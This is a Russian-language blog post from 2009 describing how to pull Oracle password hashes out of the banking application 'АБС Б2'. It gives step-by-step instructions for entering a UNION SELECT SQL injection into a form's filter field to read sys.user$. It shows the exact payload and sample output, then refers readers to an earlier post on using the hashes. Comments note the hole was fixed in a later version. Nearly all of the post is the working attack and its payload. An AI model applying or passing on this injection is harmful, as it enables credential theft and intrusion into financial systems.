четверг, 30 июля 2009 г.

АБС Б2. Получение hashkeys.

Решил сделать отдельный пост посвященный именно получению хэш-паролей. Он будет продолжением предыдущего поста "Хранение паролей в Oracle" и дополнением к посту "АБС Б2. Ограничили доступ?".

Платформа для экспериментов в АБС Б2.
Заходим на формочку /Документы/Подтипы документов/ она состоит из трех полей. Это нам дает возможность создавать маленькие подзапросики для вывода нужной нам информации. Например, вывод хэша из таблицы user$ ))).

Формируем пользовательский фильтр.
На форме нажимаем F7, отобразиться форма фильтров, нажимаем на "редактировать" начинаем настраивать сам пользовательский фильтр. Выбираем поле "Код", операцию "одно из" и в значение прописываем строку:
0) union select user#, name, password from sys.user$ where password is not null order by 2 --
После нажимаем применить и принять. На форму выведется результат запроса в виде:
id | user | hashkey
--------------------
1 | sys | 89nf838v
...| ... | ...
А что делать с полученными данными было написано в предыдущем посте ...

4 комментария:

  1. Эту возможность уже закрыли...

    ОтветитьУдалить
  2. Точно? интересно, а с какой версии уже не работает?

    ОтветитьУдалить
  3. ы ))) не прошло и века, а ведь действительно исправили брешь! начиная с версии 3.17.2 инъекции не работают. молодцы цс!

    ОтветитьУдалить
  4. Все равно, как было говном так и осталось

    ОтветитьУдалить